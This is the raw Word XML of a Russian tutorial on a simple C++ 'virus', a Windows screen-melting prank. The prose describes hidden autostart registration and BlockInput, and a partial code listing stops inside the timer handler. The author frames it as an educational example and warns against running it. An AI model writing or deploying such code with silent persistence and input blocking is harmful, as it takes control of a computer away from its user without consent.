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22E1" w14:textId="7C11CFD2" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Простейший вирус на </w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF20F4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F97147" w14:textId="514DE2B5" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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Этот код представляет собой программу для Windows, которая создает окно поверх всех остальных окон (WS_EX_TOPMOST), имитируя эффект “плавления” экрана. Программа также регистрирует себя в автозагрузке Windows под именем “virus”, что делает её потенциально вредоносной. Разберём код по частям:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B9100" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Заголовки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21768F88" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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#include &lt;windows.h&gt;: Включает основной заголовок Windows API, предоставляющий доступ к различным функциям системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D28C6" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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#include &lt;winuser.h&gt;: Включает заголовок, содержащий функции для работы с окнами и устройствами ввода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C221FF" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Глобальные переменные:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9F2D52" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ScreenWidth, ScreenHeight: Хранят ширину и высоту экрана.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A7C08" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Interval: Устанавливает интервал обновления эффекта плавления в миллисекундах (40 мс).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E94FF31" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Функция Melter (обработчик оконных сообщений):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650EF528" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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Эта функция обрабатывает сообщения, отправляемые в окно программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DFF133" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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WM_CREATE: Обрабатывается при создании окна. Код копирует содержимое рабочего стола в окно программы с помощью BitBlt, устанавливает два таймера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F34FA0E" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Таймер 1 (wParam == 1): Выполняет эффект плавления.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E69E4B1" w14:textId="06A95DF7" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Таймер 2 (wParam == 2): Завершает программу через 30 секунд</w:t>
      </w:r>
      <w:r w:rsidR="003B072E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t xml:space="preserve"> (создано для безопасности запуска)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F775303" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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WM_PAINT: Обрабатывается при необходимости перерисовки окна. ValidateRect сообщает системе, что окно уже нарисовано.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB86578" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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WM_TIMER: Обрабатывается при срабатывании таймера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20197C18" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Если wParam == 1, выполняется эффект плавления: случайная полоса шириной Width копируется из верхней части окна в случайную позицию (X, Y). Это создаёт эффект “стекания” или “плавления”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA73D9" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Если wParam == 2, отправляется сообщение WM_QUIT, завершая программу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FAF81D" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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WM_DESTROY: Обрабатывается при закрытии окна. Удаляет таймеры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D57CA" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Функции работы с реестром:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED9F65" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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IsMyProgramRegisteredForStartup: Проверяет, зарегистрирована ли программа в автозагрузке под именем pszAppName.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B08DCAD" w14:textId="7F3BE506" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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RegisterMyProgramForStartup: Регистрирует программу в автозагрузке под именем pszAppName с указанным путем к исполняемому файлу (pathToExe). Обратите внимание на то, как формируется строка для реестра с кавычками вокруг пути к исполняемому файлу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E06C3C4" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Функция RegisterProgram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64913E1F" w14:textId="0814D5D2" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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lastRenderedPageBreak/>
        <w:t>Эта функция регистрирует текущую программу в автозагрузке под именем “virus”. </w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Это очень опасная функция, которая может быть использована для создания вредоносного ПО.</w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t> Программа будет автоматически запускаться при каждой загрузке системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33091849" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Функция main:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF56702" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Регистрирует программу в автозагрузке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277DA44D" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Получает ширину и высоту экрана.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A14D918" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Создает окно с классом ScreenMelter и размером экрана.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD92D42" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Инициализирует генератор случайных чисел.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AA1804" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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Запускает</w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>цикл</w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>обработки</w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>сообщений</w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GetMessage, TranslateMessage, DispatchMessage). </w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>Важно отметить, что BlockInput(TRUE) блокирует ввод пользователя, что делает программу еще более назойливой и потенциально вредоносной.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72681F87" w14:textId="77777777" w:rsidR="00280D47" w:rsidRPr="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:p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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>В целом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8E6239" w14:textId="084F58F2" w:rsidR="00280D47" w:rsidRDefault="00280D47" w:rsidP="00280D47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>Программа создаёт раздражающий визуальный эффект и регистрирует себя в автозагрузке без ведома пользователя, что является признаком вредоносного ПО. Код не содержит сложных алгоритмов, но использует базовые функции Windows API для достижения своей цели. </w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Из-за функции RegisterProgram</w:t>
      </w:r>
      <w:r w:rsidR="00933E0D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> не рекомендуется запускать этот код</w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00280D47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t> Это учебный пример того, как можно использовать Windows API для создания нежелательного поведения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A1309" w14:textId="1743AFF2" w:rsidR="00933E0D" w:rsidRPr="00A3476E" w:rsidRDefault="00933E0D" w:rsidP="00280D47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</w:rPr>
        <w:t>Код</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF20F4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF20F4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C994C83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#include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A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60191DF2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#include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A31515"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;winuser.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9EBD62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</w:p>
    <w:p w14:paraId="6AD424BA" w14:textId="77777777" w:rsidR="00A3476E" w:rsidRPr="00AF20F4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F20F4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//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Глобальные</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF20F4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переменные</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6791E263" w14:textId="77777777" w:rsidR="00A3476E" w:rsidRPr="00AF20F4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F20F4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF20F4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ScreenWidth, ScreenHeight;  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF20F4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//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Ширина</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF20F4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и</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF20F4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высота</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF20F4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экрана</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A6E2AE" w14:textId="6A0F9E70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FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>int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Interval = 40;           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Интервал между обновлениями эффекта плавления (в миллисекундах)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37530A93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07C96952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8000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>// Функция окна "Melter", обрабатывающая сообщения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DA1FF1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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>LRESULT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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>CALLBACK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Melter(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>HWND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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>hWnd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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>UINT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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Msg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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>WPARAM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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>wParam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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>LPARAM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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>lParam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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F084062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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9AD5A8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switch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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Msg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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710350A4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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27398FC7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case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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>WM_CREATE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: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Сообщение создано новое окно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D83DB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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C85C19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Получаем дескрипторы контекстов устройства для рабочего стола и окна</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F82085F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2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HDC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Desktop = GetDC(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HWND_DESKTOP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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A87DD76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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>HDC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Window = GetDC(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>hWnd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>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1947AD25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6DCA1D89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Копируем содержимое рабочего стола в созданное окно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDBFA57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BitBlt(Window, 0, 0, ScreenWidth, ScreenHeight, Desktop, 0, 0,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SRCCOPY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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1FD942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</w:p>
    <w:p w14:paraId="0FDEAA59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Освобождаем контексты устройств</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39C51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ReleaseDC(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>hWnd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>, Window);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49E182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ReleaseDC(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>HWND_DESKTOP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>, Desktop);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D2B3E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2150BC79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Устанавливаем таймер для обновления эффекта плавления</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315B245B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SetTimer(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hWnd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1, Interval, 0); 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//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Таймер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для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эффекта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108E8BF5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</w:p>
    <w:p w14:paraId="479BE1C3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Устанавливаем таймер для завершения работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4230D2AD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SetTimer(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>hWnd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, 2, 30000, 0);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Таймер для завершения через 60 секунд</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F12B5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6B4D9E1D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Отображаем окно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7C21D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ShowWindow(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>hWnd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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>SW_SHOW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>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739E8482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break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>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E755A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F8B692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case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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>WM_PAINT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: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Сообщение перерисовать окно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780AD58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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86EC8D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Указываем системе, что прямоугольник окна уже нарисован</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092DA01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ValidateRect(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hWnd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, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36623A3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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>break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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715F1C0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C220A9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>case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WM_TIMER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: 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//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Сообщение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таймер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сработал</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6BEC8D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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195ED26A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if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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3476E">
